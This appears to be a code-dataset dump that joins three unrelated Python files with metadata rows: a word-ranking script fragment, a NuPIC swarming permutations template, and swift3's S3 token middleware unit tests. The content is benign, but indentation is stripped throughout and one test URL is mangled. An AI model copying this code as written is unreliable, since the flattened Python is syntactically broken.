print(f"{key} -> {len_for_month}")
lower_bounds = int(len_for_month / 4)
upper_bounds = int(len_for_month / 4 * 3)
WORDS_TO_CONSIDER = upper_bounds - lower_bounds
if WORDS_TO_CONSIDER == 0:
continue
ranks = ""
sum = 0
for each in months_dict[key][lower_bounds:upper_bounds]:
ranks += f" {each.klevel} {each.word}"
sum += each.klevel
print(f"avg: {sum/WORDS_TO_CONSIDER}")
print(ranks)
print("")
| mit | -389,770,890,047,582,600 | 21.956522 | 64 | 0.63447 | false |
jefffohl/nupic | tests/swarming/nupic/swarming/experiments/smart_speculation_temporal/permutations.py | 38 | 5492 | # ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2013, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero Public License for more details.
#
# You should have received a copy of the GNU Affero Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
"""
Template file used by ExpGenerator to generate the actual
permutations.py file by replacing $XXXXXXXX tokens with desired values.
This permutations.py file was generated by:
'/Users/ronmarianetti/nupic/eng/lib/python2.6/site-packages/nupic/frameworks/opf/expGenerator/ExpGenerator.py'
"""
import os
from nupic.swarming.permutationhelpers import *
# The name of the field being predicted. Any allowed permutation MUST contain
# the prediction field.
# (generated from PREDICTION_FIELD)
predictedField = 'attendance'
permutations = {
'modelParams': {
'sensorParams': {
'encoders': {
'A': PermuteEncoder(fieldName='daynight', encoderClass='SDRCategoryEncoder', w=7, n=100),
'C': PermuteEncoder(fieldName='precip', encoderClass='SDRCategoryEncoder', w=7, n=100),
'B': PermuteEncoder(fieldName='daynight', encoderClass='SDRCategoryEncoder', w=7, n=100),
'E': PermuteEncoder(fieldName='home_winloss', encoderClass='AdaptiveScalarEncoder', maxval=0.7, n=PermuteInt(13, 500, 25), clipInput=True, w=7, minval=0),
'D': PermuteEncoder(fieldName='visitor_winloss', encoderClass='AdaptiveScalarEncoder', maxval=0.786, n=PermuteInt(13, 500, 25), clipInput=True, w=7, minval=0),
'G': PermuteEncoder(fieldName='timestamp', encoderClass='DateEncoder.timeOfDay', radius=PermuteChoices([1, 8]), w=7),
'F': PermuteEncoder(fieldName='timestamp', encoderClass='DateEncoder.dayOfWeek', radius=PermuteChoices([1, 3]), w=7),
'Pred': PermuteEncoder(fieldName='attendance', encoderClass='AdaptiveScalarEncoder', maxval=36067, n=PermuteInt(13, 500, 25), clipInput=True, w=7, minval=0),
},
},
'tpParams': {
'minThreshold': PermuteInt(9, 12),
'activationThreshold': PermuteInt(12, 16),
},
}
}
# Fields selected for final hypersearch report;
# NOTE: These values are used as regular expressions by RunPermutations.py's
# report generator
# (fieldname values generated from PERM_PREDICTED_FIELD_NAME)
report = [
'.*attendance.*',
]
# Permutation optimization setting: either minimize or maximize metric
# used by RunPermutations.
# NOTE: The value is used as a regular expressions by RunPermutations.py's
# report generator
# (generated from minimize = 'nonprediction:aae:window=1000:field=attendance')
minimize = 'prediction:aae:window=1000:field=attendance'
def dummyModelParams(perm):
""" This function can be used for Hypersearch algorithm development. When
present, we don't actually run the CLA model in the OPF, but instead run
a dummy model. This function returns the dummy model params that will be
used. See the OPFDummyModelRunner class source code (in
nupic.swarming.ModelRunner) for a description of the schema for
the dummy model params.
"""
errScore = 500
if not perm['modelParams']['sensorParams']['encoders']['A'] is None:
errScore -= 50
if not perm['modelParams']['sensorParams']['encoders']['B'] is None:
errScore -= 40
if not perm['modelParams']['sensorParams']['encoders']['C'] is None:
errScore -= 30
if not perm['modelParams']['sensorParams']['encoders']['D'] is None:
errScore -= 20
if not perm['modelParams']['sensorParams']['encoders']['E'] is None:
errScore -= 15
if not perm['modelParams']['sensorParams']['encoders']['F'] is None:
errScore -= 10
if not perm['modelParams']['sensorParams']['encoders']['G'] is None:
errScore -= 5
delay = 0
#If the model only has the A field have it run slowly to simulate speculation.
encoderCount = 0
for key in perm.keys():
if 'encoder' in key and not perm[key] is None:
encoderCount+=1
delay=encoderCount*encoderCount*.1
dummyModelParams = dict(
metricValue = errScore,
metricFunctions = None,
delay=delay,
)
return dummyModelParams
def permutationFilter(perm):
""" This function can be used to selectively filter out specific permutation
combinations. It is called by RunPermutations for every possible permutation
of the variables in the permutations dict. It should return True for valid a
combination of permutation values and False for an invalid one.
Parameters:
---------------------------------------------------------
perm: dict of one possible combination of name:value
pairs chosen from permutations.
"""
# An example of how to use this
#if perm['__consumption_encoder']['maxval'] > 300:
# return False;
#
return True
| gpl-3.0 | 5,411,109,736,788,141,000 | 36.875862 | 167 | 0.68445 | false |
swiftstack/swift3-stackforge | swift3/test/unit/test_s3_token_middleware.py | 2 | 34117 | # Copyright 2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import base64
import json
import logging
import time
import unittest
import uuid
import fixtures
import mock
import requests
from requests_mock.contrib import fixture as rm_fixture
from six.moves import urllib
from swift3 import s3_token_middleware as s3_token
from swift.common.swob import Request, Response
from swift.common.wsgi import ConfigFileError
GOOD_RESPONSE_V2 = {'access': {
'user': {
'username': 'S3_USER',
'name': 'S3_USER',
'id': 'USER_ID',
'roles': [
{'name': 'swift-user'},
{'name': '_member_'},
],
},
'token': {
'id': 'TOKEN_ID',
'tenant': {
'id': 'TENANT_ID',
'name': 'TENANT_NAME'
}
}
}}
GOOD_RESPONSE_V3 = {'token': {
'user': {
'domain': {
'name': 'Default',
'id': 'default',
},
'name': 'S3_USER',
'id': 'USER_ID',
},
'project': {
'domain': {
'name': 'PROJECT_DOMAIN_NAME',
'id': 'PROJECT_DOMAIN_ID',
},
'name': 'PROJECT_NAME',
'id': 'PROJECT_ID',
},
'roles': [
{'name': 'swift-user'},
{'name': '_member_'},
],
}}
class TestResponse(requests.Response):
"""Utility class to wrap requests.Response.
Class used to wrap requests.Response and provide some convenience to
initialize with a dict.
"""
def __init__(self, data):
self._text = None
super(TestResponse, self).__init__()
if isinstance(data, dict):
self.status_code = data.get('status_code', 200)
headers = data.get('headers')
if headers:
self.headers.update(headers)
# Fake the text attribute to streamline Response creation
# _content is defined by requests.Response
self._content = data.get('text')
else:
self.status_code = data
def __eq__(self, other):
return self.__dict__ == other.__dict__
@property
def text(self):
return self.content
class FakeApp(object):
calls = 0
"""This represents a WSGI app protected by the auth_token middleware."""
def __call__(self, env, start_response):
self.calls += 1
resp = Response()
resp.environ = env
return resp(env, start_response)
class S3TokenMiddlewareTestBase(unittest.TestCase):
TEST_AUTH_URI = 'https://fakehost/identity'
TEST_URL = '%s/v2.0/s3tokens' % (TEST_AUTH_URI, )
TEST_DOMAIN_ID = '1'
TEST_DOMAIN_NAME = 'aDomain'
TEST_GROUP_ID = uuid.uuid4().hex
TEST_ROLE_ID = uuid.uuid4().hex
TEST_TENANT_ID = '1'
TEST_TENANT_NAME = 'aTenant'
TEST_TOKEN = 'aToken'
TEST_TRUST_ID = 'aTrust'
TEST_USER = 'test'
TEST_USER_ID = uuid.uuid4().hex
TEST_ROOT_URL = 'http://127.0.0.1:5000/'
def setUp(self):
super(S3TokenMiddlewareTestBase, self).setUp()
self.logger = fixtures.FakeLogger(level=logging.DEBUG)
self.logger.setUp()
self.time_patcher = mock.patch.object(time, 'time', lambda: 1234)
self.time_patcher.start()
self.app = FakeApp()
self.conf = {
'auth_uri': self.TEST_AUTH_URI,
}
self.middleware = s3_token.S3Token(self.app, self.conf)
self.requests_mock = rm_fixture.Fixture()
self.requests_mock.setUp()
def tearDown(self):
self.requests_mock.cleanUp()
self.time_patcher.stop()
self.logger.cleanUp()
super(S3TokenMiddlewareTestBase, self).tearDown()
def start_fake_response(self, status, headers):
self.response_status = int(status.split(' ', 1)[0])
self.response_headers = dict(headers)
class S3TokenMiddlewareTestGood(S3TokenMiddlewareTestBase):
def setUp(self):
super(S3TokenMiddlewareTestGood, self).setUp()
self.requests_mock.post(self.TEST_URL,
status_code=201,
json=GOOD_RESPONSE_V2)
# Ignore the request and pass to the next middleware in the
# pipeline if no path has been specified.
def test_no_path_request(self):
req = Request.blank('/')
self.middleware(req.environ, self.start_fake_response)
self.assertEqual(self.response_status, 200)
# Ignore the request and pass to the next middleware in the
# pipeline if no Authorization header has been specified
def test_without_authorization(self):
req = Request.blank('/v1/AUTH_cfa/c/o')
self.middleware(req.environ, self.start_fake_response)
self.assertEqual(self.response_status, 200)
def test_nukes_auth_headers(self):
client_env = {
'HTTP_X_IDENTITY_STATUS': 'Confirmed',
'HTTP_X_ROLES': 'admin,_member_,swift-user',
'HTTP_X_TENANT_ID': 'cfa'
}
req = Request.blank('/v1/AUTH_cfa/c/o', environ=client_env)
self.middleware(req.environ, self.start_fake_response)
self.assertEqual(self.response_status, 200)
for key in client_env:
self.assertNotIn(key, req.environ)
def test_without_auth_storage_token(self):
req = Request.blank('/v1/AUTH_cfa/c/o')
req.headers['Authorization'] = 'AWS badboy'
self.middleware(req.environ, self.start_fake_response)
self.assertEqual(self.response_status, 200)
def _assert_authorized(self, req, expect_token=True,
account_path='/v1/AUTH_TENANT_ID/'):
self.assertTrue(req.path.startswith(account_path))
expected_headers = {
'X-Identity-Status': 'Confirmed',
'X-Roles': 'swift-user,_member_',
'X-User-Id': 'USER_ID',
'X-User-Name': 'S3_USER',
'X-Tenant-Id': 'TENANT_ID',
'X-Tenant-Name': 'TENANT_NAME',
'X-Project-Id': 'TENANT_ID',
'X-Project-Name': 'TENANT_NAME',
'X-Auth-Token': 'TOKEN_ID',
}
for header, value in expected_headers.items():
if header == 'X-Auth-Token' and not expect_token:
self.assertNotIn(header, req.headers)
continue
self.assertIn(header, req.headers)
self.assertEqual(value, req.headers[header])
# WSGI wants native strings for headers
self.assertIsInstance(req.headers[header], str)
self.assertEqual(1, self.middleware._app.calls)
self.assertEqual(1, self.requests_mock.call_count)
request_call = self.requests_mock.request_history[0]
self.assertEqual(json.loads(request_call.body), {'credentials': {
'access': 'access',
'signature': 'signature',
'token': base64.urlsafe_b64encode(b'token').decode('ascii')}})
def test_authorized(self):
req = Request.blank('/v1/AUTH_cfa/c/o')
req.environ['swift3.auth_details'] = {
'access_key': u'access',
'signature': u'signature',
'string_to_sign': u'token',
}
req.get_response(self.middleware)
self._assert_authorized(req)
def test_tolerate_missing_token_id(self):
resp = copy.deepcopy(GOOD_RESPONSE_V2)
del resp['access']['token']['id']
self.requests_mock.post(self.TEST_URL,
status_code=201,
json=resp)
req = Request.blank('/v1/AUTH_cfa/c/o')
req.environ['swift3.auth_details'] = {
'access_key': u'access',
'signature': u'signature',
'string_to_sign': u'token',
}
req.get_response(self.middleware)
self._assert_authorized(req, expect_token=False)
def test_authorized_bytes(self):
req = Request.blank('/v1/AUTH_cfa/c/o')
req.environ['swift3.auth_details'] = {
'access_key': b'access',
'signature': b'signature',
'string_to_sign': b'token',
}
req.get_response(self.middleware)
self._assert_authorized(req)
def test_authorized_http(self):
protocol = 'http'
host = 'fakehost'
port = 35357
self.requests_mock.post(
'%s://%s:%s/v2.0/s3tokens' % (protocol, host, port),
status_code=201, json=GOOD_RESPONSE_V2)
self.middleware = (
s3_token.filter_factory({'auth_protocol': 'http',
'auth_host': host,
'auth_port': port})(self.app))
req = Request.blank('/v1/AUTH_cfa/c/o')
req.environ['swift3.auth_details'] = {
'access_key': u'access',
'signature': u'signature',
'string_to_sign': u'token',
}
req.get_response(self.middleware)
self._assert_authorized(req)
def test_authorized_v3(self):
protocol = 'http'
host = 'fakehost'
port = 35357
self.requests_mock.post(
'%s://%s:%s/v3/s3tokens' % (protocol, host, port),
status_code=201, json=GOOD_RESPONSE_V2)
self.middleware = (
s3_token.filter_factory({'auth_protocol': 'http',
'auth_host': host,
'auth_port': port,
'auth_version': '3'})(self.app))
req = Request.blank('/v1/AUTH_cfa/c/o')
req.environ['swift3.auth_details'] = {
'access_key': u'access',
'signature': u'signature',
'string_to_sign': u'token',
}
req.get_response(self.middleware)
self._assert_authorized(req)
def test_authorized_trailing_slash(self):
self.middleware = s3_token.filter_factory({
'auth_uri': self.TEST_AUTH_URI + '/'})(self.app)
req = Request.blank('/v1/AUTH_cfa/c/o')
req.environ['swift3.auth_details'] = {
'access_key': u'access',
'signature': u'signature',
'string_to_sign': u'token',
}
req.get_response(self.middleware)
self._assert_authorized(req)
def test_authorization_nova_toconnect(self):
req = Request.blank('/v1/AUTH_swiftint/c/o')
req.environ['swift3.auth_details'] = {
'access_key': u'access:FORCED_TENANT_ID',
'signature': u'signature',
'string_to_sign': u'token',
}
req.get_response(self.middleware)
self._assert_authorized(req, account_path='/v1/AUTH_FORCED_TENANT_ID/')
@mock.patch.object(requests, 'post')
def test_insecure(self, MOCK_REQUEST):
self.middleware = s3_token.filter_factory(
{'insecure': 'True', 'auth_uri': 'http://example.com'})(self.app)
text_return_value = json.dumps(GOOD_RESPONSE_V2)
MOCK_REQUEST.return_value = TestResponse({
'status_code': 201,
'text': text_return_value})
req = Request.blank('/v1/AUTH_cfa/c/o')
req.environ['swift3.auth_details'] = {
'access_key': u'access',
'signature': u'signature',
'string_to_sign': u'token',
}
req.get_response(self.middleware)
self.assertTrue(MOCK_REQUEST.called)
mock_args, mock_kwargs = MOCK_REQUEST.call_args
self.assertIs(mock_kwargs['verify'], False)
def test_insecure_option(self):
# insecure is passed as a string.
# Some non-secure values.
true_values = ['true', 'True', '1', 'yes']
for val in true_values:
config = {'insecure': val,
'certfile': 'false_ind',
'auth_uri': 'http://example.com'}
middleware = s3_token.filter_factory(config)(self.app)
self.assertIs(False, middleware._verify)
# Some "secure" values, including unexpected value.
false_values = ['false', 'False', '0', 'no', 'someweirdvalue']
for val in false_values:
config = {'insecure': val,
'certfile': 'false_ind',
'auth_uri': 'http://example.com'}
middleware = s3_token.filter_factory(config)(self.app)
self.assertEqual('false_ind', middleware._verify)
# Default is secure.
config = {'certfile': 'false_ind',
'auth_uri': 'http://example.com'}
middleware = s3_token.filter_factory(config)(self.app)
self.assertIs('false_ind', middleware._verify)
def test_auth_version(self):
for conf, expected in [
# if provided just host/scheme, tack on the default
# version/endpoint like before
({'auth_uri': 'https://example.com'},
'https://example.com/v2.0/s3tokens'),
# if provided a version-specific URI, trust it
({'auth_uri': 'https://example.com:5000',
'auth_version': '2.0'},
'https://example.com:5000/v2.0/s3tokens'),
({'auth_uri': 'http://example.com', 'auth_version': '3'},
'http://example.com/v3/s3tokens'),
# even try to allow for future versions
({'auth_uri': 'http://example.com', 'auth_version': '4.25'},
'http://example.com/v4.25/s3tokens'),
# keystone running under mod_wsgi often has a path prefix
({'auth_uri': 'https://example.com/identity'},
'https://example.com/identity/v2.0/s3tokens'),
# doesn't really work to include version in auth_uri
({'auth_uri': 'https://example.com/v2.0'},
'https://example.com/v2.0/v2.0/s3tokens')]:
middleware = s3_token.filter_factory(conf)(self.app)
self.assertEqual(expected, middleware._request_uri)
def test_ipv6_auth_host_option(self):
config = {}
ipv6_addr = '::FFFF:129.144.52.38'
request_uri = 'https://[::FFFF:129.144.52.38]:35357/v2.0/s3tokens'
# Raw IPv6 address should work
config['auth_host'] = ipv6_addr
middleware = s3_token.filter_factory(config)(self.app)
self.assertEqual(request_uri, middleware._request_uri)
# ...as should workarounds already in use
config['auth_host'] = '[%s]' % ipv6_addr
middleware = s3_token.filter_factory(config)(self.app)
self.assertEqual(request_uri, middleware._request_uri)
# ... with no config, we should get config error
del config['auth_host']
with self.assertRaises(ConfigFileError) as cm:
s3_token.filter_factory(config)(self.app)
self.assertEqual('Either auth_uri or auth_host required',
cm.exception.message)
@mock.patch.object(requests, 'post')
def test_http_timeout(self, MOCK_REQUEST):
self.middleware = s3_token.filter_factory({
'http_timeout': '2',
'auth_uri': 'http://example.com',
})(FakeApp())
MOCK_REQUEST.return_value = TestResponse({
'status_code': 201,
'text': json.dumps(GOOD_RESPONSE_V2)})
req = Request.blank('/v1/AUTH_cfa/c/o')
req.environ['swift3.auth_details'] = {
'access_key': u'access',
'signature': u'signature',
'string_to_sign': u'token',
}
req.get_response(self.middleware)
self.assertTrue(MOCK_REQUEST.called)
mock_args, mock_kwargs = MOCK_REQUEST.call_args
self.assertEqual(mock_kwargs['timeout'], 2)
def test_http_timeout_option(self):
good_values = ['1', '5.3', '10', '.001']
for val in good_values:
middleware = s3_token.filter_factory({
'http_timeout': val,
'auth_uri': 'http://example.com',
})(FakeApp())
self.assertEqual(float(val), middleware._timeout)
bad_values = ['1, 4', '-3', '100', 'foo', '0']
for val in bad_values:
with self.assertRaises(ValueError) as ctx:
s3_token.filter_factory({
'http_timeout': val,
'auth_uri': 'http://example.com',
})(FakeApp())
self.assertTrue(ctx.exception.args[0].startswith((
'invalid literal for float():',
'could not convert string to float:',
'http_timeout must be between 0 and 60 seconds',
)), 'Unexpected error message: %s' % ctx.exception)
# default is 10 seconds
middleware = s3_token.filter_factory({
'auth_uri': 'http://example.com'})(FakeApp())
self.assertEqual(10, middleware._timeout)
def test_bad_auth_uris(self):
for auth_uri in [
'/not/a/uri',
'http://',
'//example.com/path']:
with self.assertRaises(ConfigFileError) as cm:
s3_token.filter_factory({'auth_uri': auth_uri})(self.app)
self.assertEqual('Invalid auth_uri; must include scheme and host',
cm.exception.message)
with self.assertRaises(ConfigFileError) as cm:
s3_token.filter_factory({
'auth_uri': 'nonhttp://example.com'})(self.app)
self.assertEqual('Invalid auth_uri; scheme must be http or https',
cm.exception.message)
for auth_uri in [
'http://[email protected]/',
'http://example.com/?with=query',
'http://example.com/#with-fragment']:
with self.assertRaises(ConfigFileError) as cm:
s3_token.filter_factory({'auth_uri': auth_uri})(self.app)
self.assertEqual('Invalid auth_uri; must not include username, '
'query, or fragment', cm.exception.message)
def test_bad_auth_parts(self):
with self.assertRaises(ConfigFileError) as cm:
s3_token.filter_factory({
'auth_host': 'example.com', 'auth_protocol': ''})(self.app)
self.assertEqual('Invalid auth_uri; must include scheme and host',
cm.exception.message)
with self.assertRaises(ConfigFileError) as cm:
s3_token.filter_factory({
'auth_host': 'example.com', 'auth_protocol': 'ftp'})(self.app)
self.assertEqual('Invalid auth_uri; scheme must be http or https',
cm.exception.message)
for conf in [
{'auth_host': 'example.com/?with=query'},
{'auth_host': 'user:[email protected]'},
{'auth_host': 'example.com/#with-fragment'}]:
with self.assertRaises(ConfigFileError) as cm:
s3_token.filter_factory(conf)(self.app)
self.assertEqual('Invalid auth_uri; must not include username, '
'query, or fragment', cm.exception.message)
def test_unicode_path(self):
url = u'/v1/AUTH_cfa/c/euro\u20ac'.encode('utf8')
req = Request.blank(urllib.parse.quote(url))
req.environ['swift3.auth_details'] = {
'access_key': u'access',
'signature': u'signature',
'string_to_sign': u'token',
}
req.get_response(self.middleware)
self._assert_authorized(req)
class S3TokenMiddlewareTestBad(S3TokenMiddlewareTestBase):
def test_unauthorized_token(self):
ret = {"error":
{"message": "EC2 access key not found.",
"code": 401,
"title": "Unauthorized"}}
self.requests_mock.post(self.TEST_URL, status_code=403, json=ret)
req = Request.blank('/v1/AUTH_cfa/c/o')
req.environ['swift3.auth_details'] = {
'access_key': u'access',
'signature': u'signature',
'string_to_sign': u'token',
}
resp = req.get_response(self.middleware)
s3_denied_req = self.middleware._deny_request('AccessDenied')
self.assertEqual(resp.body, s3_denied_req.body)
self.assertEqual(
resp.status_int, # pylint: disable-msg=E1101
s3_denied_req.status_int) # pylint: disable-msg=E1101
self.assertEqual(0, self.middleware._app.calls)
self.assertEqual(1, self.requests_mock.call_count)
request_call = self.requests_mock.request_history[0]
self.assertEqual(json.loads(request_call.body), {'credentials': {
'access': 'access',
'signature': 'signature',
'token': base64.urlsafe_b64encode(b'token').decode('ascii')}})
def test_no_s3_creds_defers_to_auth_middleware(self):
# Without an Authorization header, we should just pass through to the
# auth system to make a decision.
req = Request.blank('/v1/AUTH_cfa/c/o')
resp = req.get_response(self.middleware)
self.assertEqual(resp.status_int, 200) # pylint: disable-msg=E1101
self.assertEqual(1, self.middleware._app.calls)
def test_fail_to_connect_to_keystone(self):
with mock.patch.object(self.middleware, '_json_request') as o:
s3_invalid_resp = self.middleware._deny_request('InvalidURI')
o.side_effect = s3_invalid_resp
req = Request.blank('/v1/AUTH_cfa/c/o')
req.environ['swift3.auth_details'] = {
'access_key': u'access',
'signature': u'signature',
'string_to_sign': u'token',
}
resp = req.get_response(self.middleware)
self.assertEqual(resp.body, s3_invalid_resp.body)
self.assertEqual(
resp.status_int, # pylint: disable-msg=E1101
s3_invalid_resp.status_int) # pylint: disable-msg=E1101
self.assertEqual(0, self.middleware._app.calls)
def _test_bad_reply(self, response_body):
self.requests_mock.post(self.TEST_URL,
status_code=201,
text=response_body)
req = Request.blank('/v1/AUTH_cfa/c/o')
req.environ['swift3.auth_details'] = {
'access_key': u'access',
'signature': u'signature',
'string_to_sign': u'token',
}
resp = req.get_response(self.middleware)
s3_invalid_resp = self.middleware._deny_request('InvalidURI')
self.assertEqual(resp.body, s3_invalid_resp.body)
self.assertEqual(
resp.status_int, # pylint: disable-msg=E1101
s3_invalid_resp.status_int) # pylint: disable-msg=E1101
self.assertEqual(0, self.middleware._app.calls)
def test_bad_reply_not_json(self):
self._test_bad_reply('<badreply>')
def _test_bad_reply_missing_parts(self, *parts):
resp = copy.deepcopy(GOOD_RESPONSE_V2)
part_dict = resp
for part in parts[:-1]:
part_dict = part_dict[part]
del part_dict[parts[-1]]
self._test_bad_reply(json.dumps(resp))
def test_bad_reply_missing_token_dict(self):
self._test_bad_reply_missing_parts('access', 'token')
def test_bad_reply_missing_user_dict(self):
self._test_bad_reply_missing_parts('access', 'user')
def test_bad_reply_missing_user_roles(self):
self._test_bad_reply_missing_parts('access', 'user', 'roles')
def test_bad_reply_missing_user_name(self):
self._test_bad_reply_missing_parts('access', 'user', 'name')
def test_bad_reply_missing_user_id(self):
self._test_bad_reply_missing_parts('access', 'user', 'id')
def test_bad_reply_missing_tenant_dict(self):
self._test_bad_reply_missing_parts('access', 'token', 'tenant')
def test_bad_reply_missing_tenant_id(self):
self._test_bad_reply_missing_parts('access', 'token', 'tenant', 'id')
def test_bad_reply_missing_tenant_name(self):
self._test_bad_reply_missing_parts('access', 'token', 'tenant', 'name')
def test_bad_reply_valid_but_bad_json(self):
self._test_bad_reply('{}')
self._test_bad_reply('[]')
self._test_bad_reply('null')
self._test_bad_reply('"foo"')
self._test_bad_reply('1')
self._test_bad_reply('true')
class S3TokenMiddlewareTestDeferredAuth(S3TokenMiddlewareTestBase):
def setUp(self):
super(S3TokenMiddlewareTestDeferredAuth, self).setUp()
self.conf['delay_auth_decision'] = 'yes'
self.middleware = s3_token.S3Token(FakeApp(), self.conf)
def test_unauthorized_token(self):
ret = {"error":
{"message": "EC2 access key not found.",
"code": 401,
"title": "Unauthorized"}}
self.requests_mock.post(self.TEST_URL, status_code=403, json=ret)
req = Request.blank('/v1/AUTH_cfa/c/o')
req.environ['swift3.auth_details'] = {
'access_key': u'access',
'signature': u'signature',
'string_to_sign': u'token',
}
resp = req.get_response(self.middleware)
self.assertEqual(
resp.status_int, # pylint: disable-msg=E1101
200)
self.assertNotIn('X-Auth-Token', req.headers)
self.assertEqual(1, self.middleware._app.calls)
self.assertEqual(1, self.requests_mock.call_count)
request_call = self.requests_mock.request_history[0]
self.assertEqual(json.loads(request_call.body), {'credentials': {
'access': 'access',
'signature': 'signature',
'token': base64.urlsafe_b64encode(b'token').decode('ascii')}})
def test_fail_to_connect_to_keystone(self):
with mock.patch.object(self.middleware, '_json_request') as o:
o.side_effect = self.middleware._deny_request('InvalidURI')
req = Request.blank('/v1/AUTH_cfa/c/o')
req.environ['swift3.auth_details'] = {
'access_key': u'access',
'signature': u'signature',
'string_to_sign': u'token',
}
resp = req.get_response(self.middleware)
self.assertEqual(
resp.status_int, # pylint: disable-msg=E1101
200)
self.assertNotIn('X-Auth-Token', req.headers)
self.assertEqual(1, self.middleware._app.calls)
def test_bad_reply(self):
self.requests_mock.post(self.TEST_URL,
status_code=201,
text="<badreply>")
req = Request.blank('/v1/AUTH_cfa/c/o')
req.environ['swift3.auth_details'] = {
'access_key': u'access',
'signature': u'signature',
'string_to_sign': u'token',
}
resp = req.get_response(self.middleware)
self.assertEqual(
resp.status_int, # pylint: disable-msg=E1101
200)
self.assertNotIn('X-Auth-Token', req.headers)
self.assertEqual(1, self.middleware._app.calls)
class S3TokenMiddlewareTestV3(S3TokenMiddlewareTestBase):
def setUp(self):
super(S3TokenMiddlewareTestV3, self).setUp()
self.requests_mock.post(self.TEST_URL,
status_code=200,
json=GOOD_RESPONSE_V3)
def _assert_authorized(self, req,
account_path='/v1/AUTH_PROJECT_ID/'):
self.assertTrue(req.path.startswith(account_path))
expected_headers = {
'X-Identity-Status': 'Confirmed',
'X-Roles': 'swift-user,_member_',
'X-User-Id': 'USER_ID',
'X-User-Name': 'S3_USER',
'X-User-Domain-Id': 'default',
'X-User-Domain-Name': 'Default',
'X-Tenant-Id': 'PROJECT_ID',
'X-Tenant-Name': 'PROJECT_NAME',
'X-Project-Id': 'PROJECT_ID',
'X-Project-Name': 'PROJECT_NAME',
'X-Project-Domain-Id': 'PROJECT_DOMAIN_ID',
'X-Project-Domain-Name': 'PROJECT_DOMAIN_NAME',
}
for header, value in expected_headers.items():
self.assertIn(header, req.headers)
self.assertEqual(value, req.headers[header])
# WSGI wants native strings for headers
self.assertIsInstance(req.headers[header], str)
self.assertNotIn('X-Auth-Token', req.headers)
self.assertEqual(1, self.middleware._app.calls)
def test_authorized(self):
req = Request.blank('/v1/AUTH_cfa/c/o')
req.environ['swift3.auth_details'] = {
'access_key': u'access',
'signature': u'signature',
'string_to_sign': u'token',
}
req.get_response(self.middleware)
self._assert_authorized(req)
def test_authorized_bytes(self):
req = Request.blank('/v1/AUTH_cfa/c/o')
req.environ['swift3.auth_details'] = {
'access_key': b'access',
'signature': b'signature',
'string_to_sign': b'token',
}
req.get_response(self.middleware)
self._assert_authorized(req)
def test_authorized_http(self):
protocol = 'http'
host = 'fakehost'
port = 35357
self.requests_mock.post(
'%s://%s:%s/v2.0/s3tokens' % (protocol, host, port),
status_code=201, json=GOOD_RESPONSE_V3)
self.middleware = (
s3_token.filter_factory({'auth_protocol': 'http',
'auth_host': host,
'auth_port': port})(self.app))
req = Request.blank('/v1/AUTH_cfa/c/o')
req.environ['swift3.auth_details'] = {
'access_key': u'access',
'signature': u'signature',
'string_to_sign': u'token',
}
req.get_response(self.middleware)
self._assert_authorized(req)
def test_authorized_v3(self):
protocol = 'http'
host = 'fakehost'
port = 35357
self.requests_mock.post(
'%s://%s:%s/v3/s3tokens' % (protocol, host, port),
status_code=201, json=GOOD_RESPONSE_V3)
self.middleware = (
s3_token.filter_factory({'auth_protocol': 'http',
'auth_host': host,
'auth_port': port,
'auth_version': '3'})(self.app))
req = Request.blank('/v1/AUTH_cfa/c/o')
req.environ['swift3.auth_details'] = {
'access_key': u'access',
'signature': u'signature',
'string_to_sign': u'token',
}
req.get_response(self.middleware)
self._assert_authorized(req)
def test_authorized_trailing_slash(self):
self.middleware = s3_token.filter_factory({
'auth_uri': self.TEST_AUTH_URI + '/'})(self.app)
req = Request.blank('/v1/AUTH_cfa/c/o')
req.environ['swift3.auth_details'] = {
'access_key': u'access',
'signature': u'signature',
'string_to_sign': u'token',
}
req.get_response(self.middleware)
self._assert_authorized(req)
def test_authorization_nova_toconnect(self):
req = Request.blank('/v1/AUTH_swiftint/c/o')
req.environ['swift3.auth_details'] = {
'access_key': u'access:FORCED_TENANT_ID',
'signature': u'signature',
'string_to_sign': u'token',
}
req.get_response(self.middleware)
self._assert_authorized(req, account_path='/v1/AUTH_FORCED_TENANT_ID/')
def _test_bad_reply_missing_parts(self, *parts):
resp = copy.deepcopy(GOOD_RESPONSE_V3)
part_dict = resp
for part in parts[:-1]:
part_dict = part_dict[part]
del part_dict[parts[-1]]
self.requests_mock.post(self.TEST_URL,
status_code=201,
text=json.dumps(resp))
req = Request.blank('/v1/AUTH_cfa/c/o')
req.environ['swift3.auth_details'] = {
'access_key': u'access',
'signature': u'signature',
'string_to_sign': u'token',
}
resp = req.get_response(self.middleware)
s3_invalid_resp = self.middleware._deny_request('InvalidURI')
self.assertEqual(resp.body, s3_invalid_resp.body)
self.assertEqual(
resp.status_int, # pylint: disable-msg=E1101
s3_invalid_resp.status_int) # pylint: disable-msg=E1101
self.assertEqual(0, self.middleware._app.calls)
def test_bad_reply_missing_parts(self):
self._test_bad_reply_missing_parts('token', 'user', 'id')
self._test_bad_reply_missing_parts('token', 'user', 'name')
self._test_bad_reply_missing_parts('token', 'user', 'domain', 'id')
self._test_bad_reply_missing_parts('token', 'user', 'domain', 'name')
self._test_bad_reply_missing_parts('token', 'user', 'domain')
self._test_bad_reply_missing_parts('token', 'user')
self._test_bad_reply_missing_parts('token', 'project', 'id')
self._test_bad_reply_missing_parts('token', 'project', 'name')
self._test_bad_reply_missing_parts('token', 'project', 'domain', 'id')
self._test_bad_reply_missing_parts('token', 'project', 'domain',
'name')
self._test_bad_reply_missing_parts('token', 'project', 'domain')
self._test_bad_reply_missing_parts('token', 'project')
self._test_bad_reply_missing_parts('token', 'roles')
